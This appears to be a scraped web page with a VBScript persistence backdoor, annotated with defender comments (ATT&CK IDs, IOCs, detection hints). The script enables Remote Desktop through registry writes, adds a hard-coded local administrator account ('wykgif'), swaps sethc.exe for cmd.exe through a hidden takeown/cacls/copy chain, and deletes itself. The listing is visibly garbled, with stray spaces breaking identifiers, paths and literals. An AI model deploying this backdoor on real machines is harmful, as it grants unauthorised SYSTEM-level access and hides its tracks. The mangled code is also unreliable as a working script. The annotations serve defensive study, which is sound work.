A self-deleting VBS script that enables Remote Desktop (TCP 3389) through the registry, creates a local account and adds it to Administrators, and swaps sethc.exe for cmd.exe (the "sticky keys" backdoor). This is a persistence backdoor; the listing below is extraction-mangled (stray spaces inside identifiers, hex literals and registry paths) and is annotated for defenders rather than corrected.
Last Update:2018-12-08
Source: Internet
Author: User
' ---------------------------------------------------------------------------
' Stage 1: enable Remote Desktop over TCP 3389 by writing HKLM registry values
' through the WMI StdRegProv provider on the local machine (".").
'
' NOTE(review): this is persistence/backdoor tooling (ATT&CK T1112 Modify Registry,
' T1021.001 RDP). The code is left exactly as found; comments only.
' NOTE(review): the listing is extraction-mangled - spaces were inserted after "."
' in object calls, around "\" inside the registry-path strings, and inside the
' hex literal below. Taken literally, several lines are not valid VBScript and the
' path strings would not match real registry keys; the intent is still clear.
'
' Every runtime error in this script is swallowed, so a failed registry write,
' a missing key or a denied access is never reported to the operator.
On Error resume next
' HKLM hive handle for StdRegProv (0x80000002); as extracted "& h80000002" has a
' stray space and would not parse - presumably &h80000002 in the original.
Const HKEY_LOCAL_MACHINE = & h80000002
Strcomputer = "."
' stdout handle is obtained but never written to in the visible code.
Set stdout = wscript. stdout
' Bind to root\default:StdRegProv with impersonation so the writes run as the
' invoking user; HKLM writes therefore require an elevated/admin context.
Set oreg = GetObject ("winmgmts: {impersonationlevel = impersonate }! \\"&_
Strcomputer & "\ Root \ default: stdregprov ")
' Ensure the Terminal Server key and the legacy WDS\rdpwd\TDS\Tcp key exist.
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server"
Oreg. createkey HKEY_LOCAL_MACHINE, strkeypath
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp"
Oreg. createkey HKEY_LOCAL_MACHINE, strkeypath
' Dead assignment: this WinStations\RDP-Tcp path is overwritten on the next line
' before any CreateKey call, so that key is never created here.
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ winstations \ RDP-TCP"
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server"
' fDenyTSConnections = 0 turns Remote Desktop on. Detection: watch for this value
' flipping to 0 outside change control (Sysmon EID 13 / registry auditing).
Strvaluename = "fdenytsconnections"
Dwvalue = 0
Oreg. setdwordvalue HKEY_LOCAL_MACHINE, strkeypath, strvaluename, dwvalue
' PortNumber under WDS\rdpwd\TDS\Tcp (legacy location consulted by older builds).
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp"
Strvaluename = "portnumber"
' "1, 3389" is not a valid VBScript expression as extracted; the page title
' indicates the intended value is 3389 (the default RDP port).
Dwvalue = 1, 3389
Oreg. setdwordvalue HKEY_LOCAL_MACHINE, strkeypath, strvaluename, dwvalue
' Same PortNumber write under WinStations\RDP-Tcp (the location current builds use).
' Nothing in this block touches the Windows Firewall or restarts TermService, so
' inbound 3389 may still be blocked by the host firewall after these writes.
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ winstations \ RDP-TCP"
Strvaluename = "portnumber"
Dwvalue = 1, 3389
Oreg. setdwordvalue HKEY_LOCAL_MACHINE, strkeypath, strvaluename, dwvalue
' ---------------------------------------------------------------------------
' Stage 2: create a local user and add it to the local Administrators group via
' the ADSI WinNT provider (ATT&CK T1136.001 Create Account: Local Account,
' T1098 Account Manipulation).
'
' Credentials come from the first two script arguments; with no arguments the
' hard-coded defaults "wykgif" / "wykgif123456" are used. Those literal strings
' are a useful IOC: hunt for local accounts named wykgif and for Security EID
' 4720 (user created) followed by 4732 (added to Administrators) from a
' wscript.exe/cscript.exe process.
'
' The WinNT path uses the literal group name "administrators"; on non-English
' Windows the built-in group has a localized name, so the add would presumably
' fail there - silently, because errors are suppressed.
'
' As extracted, the tail of this line is mangled ("Set of = ..." and the bare
' ".adspath" argument look like the remains of a With block); it is left as found.
On Error resume next
Dim username, password: If wscript. arguments. count then: username = wscript. arguments (0): Password = wscript. arguments (1): else: username = "wykgif": Password = "wykgif123456": end if: Set wsnetwork = Createobject ("wscript. network "): OS =" winnt: // "& wsnetwork. computername: Set Ob = GetObject (OS): Set OE = GetObject (OS & "/administrators, group"): Set OD = ob. create ("user", username): OD. setpassword password: OD. setinfo: Set of = GetObject (OS & "/" & username & ", user"): Oe. add (. adspath) 'wscript. echo. adspath
' ---------------------------------------------------------------------------
' Stage 3: replace the Sticky Keys helper %SystemRoot%\system32\sethc.exe with a
' copy of cmd.exe (ATT&CK T1546.008 Accessibility Features). Pressing Shift five
' times at the logon screen - including over RDP, which Stage 1 enabled - then
' launches the swapped binary as SYSTEM. Finally the script deletes itself.
On Error resume next
Dim OBJ, success
Set OBJ = Createobject ("wscript. Shell ")
' One hidden cmd /c chain (window style 0, waits for completion):
'   takeown /F sethc.exe              - seize ownership from TrustedInstaller
'   echo y | cacls ... /g %username%:F - grant the current user Full Control
'   copy cmd.exe acmd.exe             - staging copy of cmd.exe
'   copy sethc.exe asethc.exe         - backup of the real sethc.exe
'   del sethc.exe ; ren acmd.exe sethc.exe - put cmd.exe in sethc.exe's place
' Artifacts left on disk: system32\asethc.exe (the original helper) and a
' sethc.exe whose hash/signature matches cmd.exe. Detection: file-integrity or
' hash checks on the accessibility binaries (sethc.exe, utilman.exe, ...),
' takeown/cacls command lines targeting system32, Sysmon EID 11 for asethc.exe,
' and cmd.exe spawned by winlogon.exe at the logon screen.
' %username% is expanded by cmd.exe to the user running this script, not to the
' account created in Stage 2; takeown/cacls still require an elevated context.
Success = obj. run ("CMD/C takeown/F % SystemRoot % \ system32 \ sethc.exe & Echo y | cacls % SystemRoot % \ system32 \ sethc.exe/g % username %: F & copy % SystemRoot % \ system32 \ cmd.exe % SystemRoot % \ system32 \ acmd.exe & copy % SystemRoot % \ system32 \ sethc.exe % SystemRoot % \ system32 \ asethc.exe & del % SystemRoot % \ system32 \ sethc.exe & Ren % SystemRoot % \ system32 \ acmd.exe sethc.exe ", 0, true)
' Anti-forensics: delete the script file. WScript.ScriptName is the bare file
' name (ScriptFullName carries the path), so this presumably only succeeds when
' the working directory is the script's directory; a failure is swallowed.
Createobject ("scripting. FileSystemObject"). deletefile (wscript. scriptname)